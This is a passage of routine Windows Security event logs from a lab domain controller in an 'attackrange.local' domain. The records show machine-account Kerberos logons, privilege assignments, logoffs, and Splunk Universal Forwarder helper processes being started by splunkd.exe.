- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:07:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263503
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x714C56
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263506
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263508
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1010
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263507
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x140c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263509
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263510
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x90c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263512
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x145c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263511
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1160
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:08:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263513
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x71284E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263516
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7187B2
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263515
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7187B2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59790
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:08:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263514
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7187B2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263527
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718C30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263526
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D1E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263525
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D66
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263524
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718E19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59797
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263523
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718E19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263522
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718D66
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 59794
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263521
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D66
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263520
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718D1E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263519
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718D1E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263518
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x718C30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59793
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:09:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263517
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x718C30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263528
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263530
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x680
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263529
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
